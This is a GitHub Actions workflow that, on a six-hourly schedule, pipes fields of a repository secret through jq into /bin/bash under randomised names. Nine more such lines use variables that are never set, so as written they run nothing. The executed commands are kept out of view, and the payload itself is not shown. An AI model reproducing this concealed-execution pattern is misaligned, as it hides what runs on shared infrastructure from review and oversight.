name: yuantuimk
on:
  workflow_dispatch:
  schedule:
    - cron: '3 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yuantuimk
        env:
          yl3652: ${{ secrets.yl3652 }}
        run: |
          echo $yl3652 | jq -r .u3864 | /bin/bash
          echo $gzmi04074 | jq -r .cpe3786 | /bin/bash
          echo $note4089 | jq -r .g2 | /bin/bash
          echo $qlgh0540 | jq -r .oqzi917 | /bin/bash
          echo $gck31 | jq -r .hvpeo223 | /bin/bash
          echo $ec7486 | jq -r .ux2 | /bin/bash
          echo $xn14 | jq -r .ljs5 | /bin/bash
          echo $dfzq326 | jq -r .doea82 | /bin/bash
          echo $nm08603 | jq -r .ll90 | /bin/bash
          echo $zq5 | jq -r .dyqo71166 | /bin/bash

